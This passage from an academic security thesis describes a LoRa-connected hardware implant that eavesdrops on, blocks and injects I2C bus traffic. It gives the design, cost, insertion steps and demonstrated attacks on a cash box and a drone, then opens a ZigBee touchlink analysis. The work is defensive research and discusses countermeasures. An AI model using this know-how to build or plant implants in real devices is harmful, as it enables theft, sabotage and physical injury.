Wireless Connectivity. We use the LoRa technology (cf. Section 4.2.1) as wireless communication interface for the implant. Competing LPWAN standards to LoRa [3] exist, such as SigFox, Weightless, and LTE Narrowband IoT, but they are currently not supported by such a large community of industrial and private partners as LoRa. However, the presented attacks could also be facilitated using one of these LPWAN technologies. TTN acts as service provider to connect the implant to the Internet using LoRa communi- cation. Application builder can register an account at the TTN website and get access to the network infrastructure in order to connect to their deployed IoT nodes via LoRaWAN. An account can be created easily using a user name, email address and password. The purpose of the application is not checked by TTN.

Hardware Architecture. The hardware architecture of the implant consists of a PCB that is equipped with various ICs as shown in Figure 4.4. The implant can be connected to a power source that provides an input voltage between 3.3V and 16V. Power can be supplied via the VCC and GND pads, either from the target device or using a battery. The front side of the implant features a power converter, an I/O interface, an MCU, a number of capacitors, as well as an optional indicator LED. This LED is activated when the implant is supplied with power and blinks each time a LoRa message is sent or received. The MCU STM32F303CBT6 [281] contains an ARM Cortex-M4 core and 128 Kbytes of Flash memory. The radio transceiver RFM95W-868S2 [130] is mounted on the backside of the implant. This module supports the LoRa technology and uses the 868 MHz frequency band. We soldered a simple wired monopole antenna of length 86.4 mm (quarter of the 868 MHz wave length) to the transceiver. For programming and debugging of the implant, a serial wire debug (SWD) interface is added to the implant. This interface can be physically removed (through breaking or cutting off) after the final version of firmware is installed on the implant.

67 4 Malicious IoT Implants

Figure 4.4: Components of the malicious IoT implant: (1) indicator LED, (2) power con- verter, (3) I/O interface for serial bus signals (SDA, SCL) and power supply (VCC, GND), (4) removable programming and debug interface, (5) MCU, (6) wired monopole antenna, (7) LoRa radio transceiver.

Software Architecture. The software architecture is based on the STM32CubeMX platform [282] that includes the hardware abstraction layer and the link layer for the MCU. The real-time operating system FreeRTOS builds on top of this vendor-specific platform. A number of libraries is installed: The board support package provides drivers for the interfaces of the implant. The LMiC library [158] implements the LoRaWAN stack, and communicates with the LoRa module. The Arduino JSON library is used to decode and encode messages received within the payload of the LoRa messages. On top, so-called ‘tasks’ are defined. For example, the ‘attack task’ implements the attack procedures, while an ‘LED task’ defines the state of the indicator LED. The implant is registered as application belonging to the TTN account of the attacker and can be operated via the TTN web console.

4.5 Evaluation

We present the results of our evaluation in this section and describe effort and consequences of inserting a malicious IoT implant into real-world products.

4.5.1 Dimensions Small dimensions are crucial in order to insert the implant into arbitrary target systems, and furthermore, to avoid visual detection. The implant has a size of 19.5x17.8 mm and a height of 4.5 mm. We measured the weight of the implant to be 3 grams. Note that these dimensions are measured without the debug header, antenna, and wires connected to the target. We assert that the dimensions of the implant are small enough for many threat scenarios, in which the enclosure provides a suitable amount of space. We assume that the layout of malicious IoT implants can be further minimized if we waive the usage of off-the-shelf hardware components.

68 4.5 Evaluation

4.5.2 Power Consumption

The malicious IoT implant has to be powered either by the power supply of the target device, or using an external battery. We determined that the power consumption of the implant during sleep mode (i.e., radio is duty cycling) is 110µA for 3.3V input voltage, while the implant consumes around 42mA in attack mode (i.e., radio listens continuously). For comparison: a regular 3.7V Lithium polymer battery with a capacity of 2000mAh supplies an implant in sleep mode for more than two years, or 176 hours in attack mode. Thus, attackers can wake a sleepy implant even months after the insertion into the target device.

4.5.3 Wireless Range

The wireless range determines from which distance an attacker is able to remotely control a malicious IoT implant. Also, it indicates in which areas the implant has coverage by an LPWAN. The implant utilizes the LoRa technology, which achieves a wireless range of 2-5 km in urban areas and up to 15 km in sub-urban areas [3]. It is hard to make general statements about the wireless range of the implant as the propagation of radio waves depends on many variables, e.g., the enclosure of the target device, building structures and walls, nearby electrical installations, as well as other deployed wireless networks that interfere with the LoRa frequency bands.

4.5.4 Cost

Once we have the final schematics, we are able to build a batch of 10 implants for the hardware costs of approximately 194 Euros. The cost per unit decrease with an increasing batch size: For a batch size of 100 units, the hardware cost add up to around 1075 Euros. Thus, we can build a malicious IoT implant using mainly off-the-shelf components for less than 11 Euros per unit (assuming a batch size of 100 units). These costs comprise the customized PCB as well as all electronic components including MCU, radio transceiver, LED, power converter, and capacitors. Not included are laboratory equipment, labor costs, shipping costs, and consumable materials.

4.5.5 Effort of Insertion

The procedure of implanting malicious hardware into the target device consists of three steps: identifying access points on the PCB, analyzing the communication on the bus, and inserting the implant into the device. In the first step, we open the case of the target device and look whether there is enough space to insert the implant. If so, we identify the PCBs and list the descriptors of all ICs. Then, we search for the datasheets of these ICs on the Internet. The identification of

69 4 Malicious IoT Implants

ICs on a PCB can also be automated using image recognition [155]. A datasheet usually contains a feature description as well as a pin layout, which we use to identify ICs that support I2C. After we confirm that an IC supports I2C, we check whether the I2C pins are used. Optical indications are signal lines on the PCB that are connected to these pins. Then, we look for suitable solder points on the PCB where we can later attach the wires to the implant. It is not advisable to directly solder the wires onto the pins of an IC since this requires a very precise way of working and can easily lead to damages or electrical shorts with neighboring pins. Good access points are larger solder joints, for example, at surface-mounted capacitors or at through-hole connections. As second step, we use a logic analyzer to inspect the communication on the bus. Using logic diagrams, we identify the ICs that communicate with each other, the bus frequency, and the transmitted data (datasheets might help again). As a result, we configure the software of the implant accordingly. In the third step, we solder wires onto the access points after we have removed the power supply and batteries. Then, we attach the wires to the implant. If required, we fixate the implant within the target device such that the antenna does not touch other electronic parts. We supply the target device with power again, and if the insertion was successful, the indicator LED on the implant turns on. In addition, we test whether the implant can be remotely controlled. Finally, we close the casing of the target device and try to remove all traces of this modification procedure. The danger of damaging the PCB boards during the insertion of the implant is low if we take standard precautions: The process of insertion should be performed in an elec- trostatic discharge protected area. In this area, all conductive materials and workers are grounded and mechanisms to prevent the build-up of electrostatic charges should be in place. Furthermore, the power supply needs to be safely removed to prevent electrical shorts. Then, the danger of damaging the target device is mainly reduced to the threat of thermal influences on the ICs from the soldering process and physical damages. In the physical distribution process, time is crucial. Thus, the time to insert the implant into the target system should be appropriate. If we want to insert the implant into a large batch of similar target devices, the customization of the implant is only required once. From our experience, the process of customization can add up to a few hours. The insertion process needs to be performed for each target device. In our experiments, the manual inserting of the implants takes a few minutes, in some cases we were even able to insert the implant within less than a minute.

4.5.6 Feasibility of Attacks

We demonstrate the feasibility of the attacks outlined in Section 4.4.2 through inserting the malicious IoT implant into three exemplarily target devices: One evaluation board and two real-world products. We selected the real-world products through searching online in databases of disassembled products, e.g., iFixit, for security- and safety-relevant devices that indicate the usage of I2C communication.

70 4.5 Evaluation

(a) Cash box (b) Drone (implant with debug header)

Figure 4.5: Malicious IoT implant (green PCB) inserted into exemplary target devices.

Evaluation Board. The first hardware platform is an evaluation board that was specif- ically designed to test the implementation of the implant. It imitates a monitoring ap- plication that observes the temperature of an industrial manufacturing process. If the temperature exceeds or undercuts a preconfigured threshold, an alarm is triggered and the light of an LED diode warns the operator. From a technical perspective, the MCU reads temperature sensor data from the registers of the sensor via I2C, and shows the value on an LCD display. The lower and upper bounds of the temperature threshold are stored in the registers of the temperature sensor. After attaching the implant to the SDA and SCL solder pads of the evaluation board, we are able to perform all attacks described in Section 4.4.2. During sleep mode, the implant does not interfere with the normal operation of the evaluation board. In attack mode, the implant eavesdrops the current temperature values as well as the threshold configuration, which both are requested multiple times per second by the MCU. The implant then relays these values to the attacker’s operator interface. Upon receiving the DoS command from the attacker, the implant disables all communication on the bus. On the target device, the MCU cannot read data from the sensor anymore and throws an exception, which results in a bus error message on the display. Furthermore, the implant can inject own transactions to read the data stored in the registers of the sensor, and to write new values to the registers. This way, the attacker is able to reconfigure the threshold that triggers the alarm. Finally, we are able to manipulate legitimate temperature values on the bus by performing the on-the-fly bit modification attack. Exemplary, we changed one bit of a temperature value byte such that the bus transferred 0x0F instead of 0x8F. As a result, the MCU reads a temperature of 15.9 ◦C instead of 28.9 ◦C.

Cash Box. As a second hardware platform, we inserted the implant into a First Alert 3040DFE cash box that allows access by entering a pin into an electronic pin pad. Each time a pin is entered into the pin pad, the MCU uses I2C communication to read the

71 4 Malicious IoT Implants master pin stored in an EEPROM. If the entered pin matches the master pin, the content of the cash box can be accessed. The master pin is set by pushing a red button that is located inside the cash box, and then entering the new master pin two times into the pin pad. Assuming that the attacker inserts the implant at some point during the physical distribution process, the attacker is later able to eavesdrop and set the master pin, and thus, to access the content of the box. As shown in Figure 4.5a, we attached the SDA and SCL wires of the implant to solder points of a pull-up resistor and the reset button, respectively. To supply the implant with power, we attached the VCC and GND wires to solder points connected to the batteries of the cash box. The enclosure of the cash box provides plenty of space for the implant and a wired monopole antenna. Controlling the implant from the operator interface, we performed eavesdropping, DoS, and the injection of transactions. First, the attacker is able to monitor the bus to retrieve the master pin that is requested by the MCU each time a pin is entered into the pin pad. The implant then exfiltrates the master pin via the wireless interface. In addition, the implant can disable all I2C communication upon receiving a DoS command from the attacker. Then, the MCU cannot read the master pin from the EEPROM anymore, and thus, does not unlock the cash box. During the evaluation, we detected a manufacturer-specified modification of the I2C bus: during idle times, the master constantly writes an oscillating signal on the SDA line. This signal clears for around 300ms after a button on the pin pad was pushed. Since the attacker cannot inject own transactions as long as the oscillating signal is occupying the SDA line, the implant has to wait to execute its transactions until the user pushes an arbitrary button on the pin pad. Through the injection of own commands, the attacker can read the master pin from the EEPROM and also set this pin to an arbitrary value. During sleep mode, the implant does not influence the normal operation of the cash box.

Drone. We used a Syma X5C-1 drone as third hardware platform to evaluate the mali- cious IoT implant. The drone features a gyroscope and accelerometer sensor that stabilizes the drone during flights. An MCU reads data from this sensor every 3ms using I2C com- munication, and subsequently adjusts the individual speed of the four rotors according to its flight position. As depicted in Figure 4.5b, we attached the SDA and SCL wires of the implant to a pin of the MCU as well as a pin of the sensor. Also, we attached the GND and VCC wires to solder points that are connected to the battery power supply of the drone. The body of the drone provides enough space for the implant and its antenna. Also, the drone is capable of carrying the implant without any effects on its flight characteristics. During sleep mode, the implant does not affect the normal operation of the drone. We performed eavesdropping and DoS attacks on the drone. Using the implant, the attacker can eavesdrop on the sensor data that is requested by the MCU. This sensor data contains triple-axis angular rates as well as triple-axis accelerometer data. Parts of these aggre- gated information can be sent to the attacker in regular intervals. Upon receiving a DoS command from the attacker, the implant blocks the I2C bus through pulling both lines to low. The MCU of the drone cannot read data from the gyroscope and accelerometer, and thus, the speed of the rotors is not adjusted anymore. In consequence, the flight position of drone destabilizes and the drone hits the ground.

72 4.6 Discussion

4.6 Discussion

The results of our evaluation underline two major threats: As a first threat, the emergence of IoT infrastructure provide novel attack vectors besides DoS attacks on Internet infras- tructure [12, 157]. As we demonstrate, malicious IoT implants connected to LPWANs can be leveraged to exfiltrate secret information, manipulate the functionality of target devices, and in worst case, might even pose a threat to humans. Such attacks can be performed anonymously as one can register an account and set up the application without any identification at the website of the LoRaWAN service provider TTN. Furthermore, the attacker can control the implant from a remote location over the Internet. These attacks are not specific to LoRaWAN and can also be performed using other competing LPWAN standards. We note that the usage of traditional mobile telephony infrastructure (e.g., GSM and LTE) would not satisfy the design criteria given in Section 4.4.1 since a GSM or LTE radio transceiver consumes more energy, the attacker would have to pay for data transmissions, and in most countries a SIM card registration requires an official identifi- cation document. The effort of building such an implant is relatively low for experts since the hardware and software design is based mainly on off-the-shelf components and open- source software, respectively. Thus, the dissemination of LPWANs open up new attack vectors, which did not exist before when traditional mobile telephony infrastructure was the only wide-area connectivity provider. As a second threat, serial communication on PCBs is vulnerable to malicious hardware inserted during physical distribution in the supply chain. While the presented malicious IoT implant is tailored to attack I2C buses, other serial communication systems, such as UART and SPI, could be adapted with a reasonable effort. However, we might only be able to apply a subset of the presented attacks to other bus systems due to different approaches in the electronic design of these systems. In contrast to other serial buses, I2C facilitates a communication protocol that allows multiple masters on the bus. Since the implant acts as a master, the injection of own transactions in SPI and UART communication is not easily possible. Nevertheless, we can eavesdrop the communication between ICs to exfil- trate information and perform DoS attacks through pulling all lines of the communication system to a low voltage state. As shown in our evaluation, both attacks had a significant impact on the security and reliability of the target devices. One might ask why should attackers use malicious IoT implants when malicious software (malware) could do the same job? Although we agree that the effort of facilitating malware might be lower, malware falls short in several scenarios. First, if the target device has no Internet connection, then malware has usually no communication channel to the attacker. For this reason, neither of our three evaluation devices could be remotely attacked using malware due to missing network interfaces. Second, in case a direct interference with serial communication on hardware level is desired, e.g., to circumvent software protection mechanisms. Third, malware could be detected by other software, in contrast to implants that are “invisible” at software level. During the evaluation, the implant had no influence on the regular operation of the target device except if the attacker performs an attack.

73 4 Malicious IoT Implants

Since the attacks directly influence the communication on hardware level, an incident investigator is not able to find digital traces in the log files of the target device’s software. The only indications might be exceptions triggered by the MCU and physical evidence, e.g., the presence of an implant or traces on the PCB that indicate that an implant was attached. So far, malicious IoT implants have been considered neither in theoretical hardware se- curity models, nor in practical approaches to secure hardware against malicious modifica- tions. Since we demonstrated feasibility of these threats, we conclude that future hardware security efforts have to take implants into account.

4.6.1 Limitations

The threat of LPWAN-connected malicious IoT implants comes with a number of limita- tions for attackers. Each implant needs to be inserted manually, which renders this attack procedure unsuitable for large-scale operations in which thousands of devices have to be modified. Furthermore, expert knowledge in electronic engineering and programming of software is necessary for the preparation and insertion of an implant. Moreover, a number of potential target devices, e.g., mobile phones and tablets, might not provide enough space within the enclosure to carry an implant that is designed using mainly off-the-shelf components. Also, the feasibility of utilizing an LPWAN-connected implant is limited through the coverage of the selected service provider’s LPWAN infrastructure. Finally, the amount of exfiltrated data is restricted since LPWANs only provide low data rates to achieve their low-power objectives. Nevertheless, the bandwidth between implant and attacker is reasonable for most threat scenarios.

4.6.2 Countermeasures

We analyze a variety of potential approaches to encounter malicious IoT implants, which we divide into detection and safeguard mechanisms. While detection mechanisms disclose the presence of a malicious IoT implant in a system, safeguard mechanisms prohibit an implant from interfering with the serial communication.

Detection Mechanisms. A trivial approach to detect malicious IoT implants is visual inspection of the PCBs. The advantage is that no expensive equipment is required. On the other hand, this requires the removal of the enclosure for most products, which could be quite a cumbersome task since many products are not intended to be disassembled. Therefore, this approach becomes impractical if large batches of products should be in- vestigated. Also, future implant layouts might become smaller and can be implemented into PCBs hidden as legitimate ICs, which makes visual detection much harder and more time-consuming. In addition, non-expert user might not be able to recognize malicious hardware elements if the implant is camouflaged as a legitimate part of the PCB.

74 4.6 Discussion

Since malicious IoT implants have a physical appearance, another detection approach is to compare the weight of suspicious products with the weight of an evidently unmodified product. The advantage of this approach is low costs as only a precision scale is needed. The disadvantage is that an attacker can potentially reduce the weight of a modified device by removing small pieces of the enclosure. Also, this approach is not suitable for heavy devices since the weight of the implant might be hidden within the measurement tolerance.

In anomaly detection, potential side-channel effects resulting from the presence of an im- plant are observed. For instance, the implant consumes a certain amount of power as evaluated in Section 4.5.2, which might be supplied from the host system. Thus, the power consumption of manipulated products should show anomalies compared to unal- tered products. Also, malicious IoT implants provide a wireless interface that emits radio waves, which can be detected with special equipment. The advantage of anomaly detection procedures is potential large-scale automation. The disadvantage is the need for hardware extensions on the products or special equipment in testing facilities.

Safeguard Mechanisms. Another way to protect against the insertion of malicious IoT implants is the adding of tamper-evident features. For example, the packaging of a product can be sealed in way that the attacker cannot access the product without irreversibly destroying the sealing. Also, physical security measures, such as a locked encasement or resin encapsulation, could be in place to protect the PCB against tampering. Tamper resistance does not always prevent the implementation of an implant but it increases the attacker’s effort and makes the detection of malicious actions much more likely.

The usage of cryptographic security measures can be a countermeasure to circumvent malicious IoT implants to read and inject messages into the serial buses. Lazaro et al. [171] proposed an authenticated encryption scheme for I2C buses. In their proposal, the I2C data frames are encrypted and authenticated using AES-GCM, while addressing frames are not protected. The calculation of ciphertext and signature is directly implemented into the master and slave ICs. The authors assume a pre-installed key on each IC that was installed in a secure environment. The advantage of encryption is that it provides an efficient way to lock out non-authorized entities. As a disadvantage, all ICs on the bus must implement the encryption mechanism and need to be equipped with key material. Most probably, this requires a change of the I2C specifications.

Shwartz et al. [156] propose the idea of a hardware-based interface proxy firewall to protect I2C buses against malicious hardware. Unfortunately, they do not present a technical concept of their idea such that a design of this firewall remains future work. From our perspective, the challenge of this firewall is to distinguish between legitimate and malicious bus participants. Since a malicious participant can easily spoof a legitimate participant, a simple black list or white list approach is not effective. To protect against this threat, an authentication infrastructure or physical security measures are needed. As an advantage, this firewall would not need to be part of the official I2C specifications. On the backside, we need additional hardware on the PCB to implement the firewall.

75 4 Malicious IoT Implants

Oberg et al. [223] observed information flows in the I2C bus system by applying taint tracking. After identifying explicit and implicit information flows, they proposed to add an adapter to each slave device that is placed between this device and the bus. These adapters coordinate access to the slave devices by allowing only access to one device at any given point of time. We note that these proposals only consider passive attackers but not active attackers. Thus, using a malicious IoT implant, it is still possible to manipulate data on the bus since the implant has no adapter that controls the access to the bus. The advantage of this approach is that these adapters do not have to be specified in the I2C standard. The disadvantage is the need for additional hardware components on the PCBs that increase the space requirements, cost, and energy consumption.

4.7 Related Work on Malicious Hardware

Previous research investigated the insertion of malicious hardware at three stages: in the design phase, during fabrication phase, and in the post-fabrication phase. Especially hardware trojans attracted a high amount of research in the last decade. From a high level perspective, hardware trojans are malicious modifications of the hardware during the design or fabrication process. In contrast, malicious hardware implants are alien elements that are added to a system after the fabrication process. There exist different approaches to insert malicious trojans into hardware. An approach are modifications of the system design at hardware description language (HDL) level, which results in the adding of additional logic to the IC. Prototypes of these trojans have been mainly implemented and evaluated using field programmable gate arrays (FPGAs). The threat of malicious hardware trojans was first shown and evaluated by Agrawal et al. [4]. They also proposed a detection mechanism based on side-channel fingerprinting. King et al. [154] introduced hardware trojans that are able to gain unchecked memory access as well as to execute malicious firmware on the target. Lin et al. [181] presented a hardware trojan that provides physical side-channels to exfiltrate cryptographic mate- rial from an IC. Hicks et al. [124] proposed unused circuit identification (UCI), a method to identify and remove suspicious circuits using data flow graph analysis. A year later, Sturton et al. [283] presented a prototype of a hardware trojan that defeats the UCI detec- tion mechanisms. Fern et al. [90] used hardware trojans to build a covert communication channel between different components in a system-on-a-chip. G´omez-Bravo et al. [106] presented a hardware trojan that attacks I2C communication, targeting a mobile robotic application. Another approach of inserting malicious hardware is the implementation of hardware trojans at gate level during fabrication. In contrast to modifications at HDL level, this approach does not add additional logic to the system but only modifies existing hardware elements. Shiyanovskii et al. [267] introduced lifetime-reducing reliability tro- jans, which induce aging effects resulting from alternations of the fabrication processes. Becker et al. [24] demonstrated a variant, in which a hardware trojan is implemented at gate level by manipulating the dopant polarity of existing transistors. Kumar et al. [163] used hardware trojans to inject faults during the execution of a lightweight cipher, en-

76 4.8 Conclusion abling them to retrieve secret keys. This hardware trojan was also induced by altering the dopant area at gate level. A final approach of inserting malicious hardware is the adding of analog circuits to the system. The concept of an analog hardware trojan was introduced by Yang et al. [318]. They demonstrated that an attacker is able to insert analog circuits into a system at fabrication time. The first ICs that relate to hardware implants were called mod chips [253], which modify functions of the target system, e.g., to circumvent copyright protection mechanisms in video playback devices or to enable restricted features in game consoles. Compared to de- sign and fabrication phase attacks, less attention was paid by the academic community to malicious hardware attacks in post-fabrication phases. Shwartz et al. [156] demonstrated how aftermarket components, e.g., third-party touchscreens used in repairs of broken mo- bile devices, could be manipulated such that a malicious mobile phone app can get root access to the device. In a non-academic context, Datko and Reed [57] implemented a hardware implant inspired by the NSA Ant catalog [13]. Their proof-of-concept features a GSM interface to ex-filtrate data and connects to the target system via a VGA display adapter using I2C communication. To relay data from the computer, a malware on the target system is assumed that sends data via I2C to the implant. In contrast to our work, this implant does not fulfill design criteria C1 and C6. FitzPatrick [95] presented a number of proof-of-concepts for hardware implants that connect to targeted systems via I/O pins or JTAG. Although these implants fulfill most design criteria, they lack a communication interface to an IoT or cellular infrastructure (design criterion C2).

4.8 Conclusion

In this chapter, we described the implementation and evaluation of the first malicious IoT implant showing that IoT infrastructure enables novel hardware-level attack vectors. These threats grow with the expansion of LPWANs, which will supersede mobile telephony networks in terms of providing M2M connectivity in a few years. Future threat models for hardware security have to take these threats into account.

77 78 Chapter 5

Insecurity of ZigBee Touchlink Comissioning

The exploitation of security vulnerabilities in IoT systems and applications can have severe consequences for the physical safety and privacy of the users. In this chapter, we present a case study on the threat of object exploitation that analyzes security measures of a popular smart home network standard.

Contents

5.1 Introduction ...... 79 5.2 Background on ZigBee ...... 81 5.2.1 System Model ...... 82 5.2.2 Security ...... 82 5.2.3 Commissioning ...... 83 5.3 Threat Model ...... 84 5.3.1 Security Goals and Attacker Model ...... 84 5.3.2 Threat Scenarios ...... 85 5.4 Security Analysis of Touchlink Commissioning ...... 86 5.4.1 Penetration Testing Framework Z3sec ...... 87 5.4.2 Testbed ...... 87 5.4.3 Denial-of-Service Attacks ...... 89 5.4.4 Attacks to Gain Control ...... 92 5.4.5 Evaluation of Wireless Range ...... 94 5.4.6 Recovery ...... 96 5.5 Disclosure and Response ...... 97 5.6 Discussion ...... 98 5.7 Related Work on ZigBee Security ...... 100 5.8 Conclusion ...... 101

5.1 Introduction

ZigBee is a popular standard for wireless low-power communication in the Internet of Things (IoT), especially in the domain of smart home networks. The ZigBee Alliance, a non-profit organization of more than 400 member companies maintaining the ZigBee specifications, lists more than 1,300 certified products [334], and claims to have the largest

79 5 Insecurity of ZigBee Touchlink Comissioning base of installed IoT devices worldwide [331] with more than a hundred million devices [333].

In December 2016, the latest ZigBee specifications, denoted as ZigBee 3.0, were released to the public. These specifications define function clusters for several smart home ap- plications including security-critical applications such as door locks, window shades, and intruder alarm systems. To prevent the manipulation and unauthorized control of these applications, appropriate security measures are crucial for ZigBee networks. One of the most critical parts in the security design is commissioning, which is the procedure of either starting a new network or integrating a new node into an existing network. During the process of joining of a new node to an existing network, this node needs to be equipped with the network key in a secure manner, which is a challenging task for heterogeneous IoT networks that interconnect products of multiple manufacturers.

ZigBee 3.0 provides two different commissioning procedures to accomplish this task: EZ- Mode commissioning and touchlink commissioning. In this chapter, we focus on touchlink commissioning, which was originally developed to easily integrate devices in connected lighting systems that follow the (legacy) ZigBee Light Link standard. The basic idea of touchlink commissioning is to facilitate close physical proximity instead of cryptographic authentication for joining new nodes to a network. The ZigBee 3.0 specifications inherited the touchlink commissioning procedure as a commissioning option for ZigBee 3.0 products without giving guidelines whether an application is suitable for touchlink commissioning.

Our contribution is twofold. As first contribution, we provide a security analysis of the ZigBee touchlink commissioning procedure, which has not been part of a comprehensive security analysis before, to the best of our knowledge. During our investigations, we analyzed the specifications and learned that the touchlink communication relies on inter- PAN frames, which are neither secured nor authenticated. Furthermore, the transport of the network key to a joining device is protected solely by a global master key, the touchlink preconfigured link key. This key is distributed to manufacturers of touchlink- enabled products under a non-disclosure agreement (NDA) but was leaked in March 2015 and cannot be renewed due to the backward compatibility demands towards legacy ZigBee Light Link products. In addition, we learned from the specifications that the distance check between the joining node and the initiator is based on a simple signal strength threshold.

As second contribution, we developed and evaluated a real-world attack system to eaves- drop and inject packets in the communication of ZigBee networks. In this context, we release the open-source penetration testing framework Z3sec that is able to create arbi- trary touchlink commands and provides an interface to control ZigBee-certified devices once the network key is known. We evaluated our penetration testing framework on popu- lar ZigBee-certified and touchlink-enabled products of four different manufacturers. In our evaluation, we demonstrated the extraction of the current network key from a distance of 130 meters through passively eavesdropping on a touchlink commissioning procedure. In the domain of active attacks, we were able to permanently disconnect nodes from the legit- imate network, or to reset them to factory-new. We can also trigger the so-called identify

80 5.2 Background on ZigBee action, e.g., causing light bulbs to blink, for several hours. Furthermore, we demonstrated that we can remove nodes from their legitimate networks and join them to the attacker’s network. In our evaluation, we were able to perform such an active attack from a distance between 15 and 190 meters depending on the tested products. Due to limitations of the experimental setup, longer distances might be possible. In conclusion, our evaluation shows that the support of touchlink commissioning is suffi- cient to compromise the security of ZigBee 3.0 applications. In our threat scenarios, we outline that already a single touchlink-enabled device allows attackers to take control over arbitrary devices in the ZigBee network, also including security-critical applications. This chapter is structured as follows. We introduce the ZigBee 3.0 standard in Section 5.2. In Section 5.3, we present the threat model for the security analysis. In Section 5.4, we perform the security analysis of the touchlink commissioning procedure, which contains the description of novel attacks as well as their practical evaluation. In Section 5.5, we describe the disclosure to the manufacturers and their responses. We discuss the results of our evaluation, consequences, and mitigation in Section 5.6. We present related work in Section 5.7, and this chapter concludes in Section 5.8.

5.2 Background on ZigBee

ZigBee is a wireless low-power standard that connects embedded technologies in wireless personal area networks (WPANs). Compared to Wi-Fi, ZigBee-certified devices send smaller packets and consume far less energy, while ZigBee has a larger wireless range than Bluetooth. The ZigBee specifications are maintained by the ZigBee Alliance, a global non-profit or- ganization that comprises over 400 member companies. The ZigBee Alliance defines the network, security, and application layers and supervises the conformance and interoper- ability of ZigBee-certified products. The ZigBee 3.0 specifications, which were ratified in December 2015 and released to the public in December 2016, replace the ZigBee Pro spec- ifications [336] from 2012. The main difference between ZigBee 3.0 and ZigBee Pro is that the ZigBee Pro specifications facilitated several application profiles comprising customized sets of features and protocols for specific application areas. Examples of such profiles are ZigBee Home Automation [329] for applications in residential environments, ZigBee Smart Energy [328] for smart metering, or ZigBee Light Link [327] for connected lighting systems. The fragmentation in the ZigBee Pro standard resulted in interoperability problems be- tween ZigBee-certified products of different profiles such that the ZigBee Alliance decided to merge these profiles into one standard, which is ZigBee 3.0. An exception is the Smart Energy profile, which remains independent due to special requirements of smart metering applications. The ZigBee 3.0 standard is defined in multiple specification documents, of which the ZigBee 3.0 Base Device Behavior specification [330] and the ZigBee 3.0 Cluster Library specification [332] are publicly available.

81 5 Insecurity of ZigBee Touchlink Comissioning

5.2.1 System Model

The ZigBee 3.0 specifications describe three logical types of nodes: coordinator, router, and end device. Each node can comprise one or more devices, and at any point in time is designated to only one of the logical types. Coordinators and routers are usually devices that have permanent power supply, in contrast to end devices, which are usually battery- powered.

(a) Centralized security (b) Distributed security

Figure 5.1: Security network models. Notation: C = coordinator, R = router, E = end device.

Each ZigBee 3.0 network is either a distributed or a centralized security network. As illustrated in Figure 5.1a, a centralized security network is managed by a coordinator that includes the trust center. This coordinator authenticates new nodes and joins them to the network. In contrast, a distributed security network is formed by a router and has no coordinator as shown in Figure 5.1b. A new node is authenticated and joined to the network by an arbitrary router, which becomes its parent node.

5.2.2 Security

The ZigBee 3.0 stack sits on top of the physical layer and medium access control (MAC) layer defined in the IEEE 802.15.4 specifications [136]. Security measures in ZigBee appli- cations are only applied to the network and application layer. Although the MAC layer of the IEEE 802.15.4 standard specifies multiple encryption and authentication mechanisms, these mechanisms are not used in ZigBee applications. ZigBee-certified devices facilitate the AES-CCM* authenticated encryption scheme1 with an 128-bit network key. This net- work key is shared between all devices of a network and used to secure the communication.

1 Compared to AES-CCM (without asterisk), this specific mode allows also encryption-only or integrity- only variants.

82 5.2 Background on ZigBee

5.2.3 Commissioning

Commissioning is the process in which either a new ZigBee network is started, or a new node is joined to an existing ZigBee network. The ZigBee 3.0 standard specifies two commissioning procedures: EZ-Mode commissioning and touchlink commissioning. While the support of EZ-Mode commissioning is mandatory for each ZigBee 3.0 device, manu- facturers can decide whether touchlink commissioning is enabled in their products. The specifications do not provide any guideline if touchlink commissioning is appropriate for a certain application. In addition, touchlink is supported by all legacy devices that follow the ZigBee Light Link specifications.

EZ-Mode Commissioning. The EZ-Mode must be invoked with a user action, e.g., through pushing a button on the device. After this mode is activated, the node is put into EZ-Mode for a time frame of 3 minutes, which can be extended through further user actions. In EZ-Mode, a node that is not joined to a network, scans for open networks in its wireless range. In case the node finds a suitable network, it attempts to join this network using MAC association as specified in IEEE 802.15.4. If the network allows the node to join, the node waits to become authenticated and receives the network key. In a centralized security network, the network key is encrypted using either the publicly known default global Trust Center link key, which is provided in the ZigBee specifications, or via a pre-configured link key that is derived from an install code, which is a unique code printed on the node in a manufacturer-specific fashion. In a distributed security network, the network key is transmitted after being encrypted using the NDA-protected distributed security global link key.

Touchlink Commissioning. The touchlink commissioning procedure was first intro- duced in the ZigBee Light Link standard, and later adopted by the ZigBee 3.0 specifica- tions. Touchlink commissioning is patented by Philips [172] and was specifically designed to make connected lighting systems easy to deploy and use for consumers. Compared to other commissioning options, touchlink commissioning provides an extended functionality that goes beyond the plain joining of devices. The objective was to enable use cases in which commissioning is performed between a bulb and a low-function device, e.g., a remote control. For such scenarios, touchlink commissioning offers the possibility to manage net- work features, such as reset to factory-new or channel switch, with the so-called touchlink commands. Figure 5.2 describes the commissioning protocol for joining a device, denoted as target or end device, to an existing ZigBee network. The initiator is usually a remote control or a bridge device that is connected to the Internet. First, the initiator starts the device scan procedure by sending scan requests on specific channels as defined in the speci- fications. These scan requests include a randomly generated transaction identifier. The

83 5 Insecurity of ZigBee Touchlink Comissioning

Figure 5.2: Touchlink commissioning protocol. target replies with a scan response containing the same transaction identifier, a random response identifier, and further information. The device scan may yield multiple potential nodes from which the user can select one for the next steps. The user has the option to send an identify request to a device, upon which the target performs a pre-defined identify action, e.g., a bulb flashes for a few seconds. An identify request contains the corresponding transaction identifier as well as the duration of the identify action. To join a new node to a network, the initiator encrypts the current network key with the touchlink preconfigured link key, builds a network join end device request containing the encrypted network key, transaction identifier as well as further network information, and then sends this command frame to the selected node. On receiving the message, the joining node decrypts the network key using the touchlink preconfigured link key, and replies with a network join end device response indicating success or failure.

5.3 Threat Model

This section introduces the security goals and the attacker model for the subsequent se- curity analysis as well as outlines a number of threat scenarios.

5.3.1 Security Goals and Attacker Model

The ZigBee specifications describe security assumptions [336, p. 426], such as safekeeping of key material and proper implementation of security protocols, but do not define security goals [14]. For this reason, we define following security goals that apply to ZigBee networks:

• Confidentiality: Only legitimate entities are allowed to access data and commands sent within the network.

84 5.3 Threat Model

• Integrity: Data and commands sent within the network are not tampered with. • Authenticity: The receiver is able to reject commands and data sent by illegitimate entities. • Availability: The functionalities and data of the devices in the network are continu- ously available to all legitimate entities.

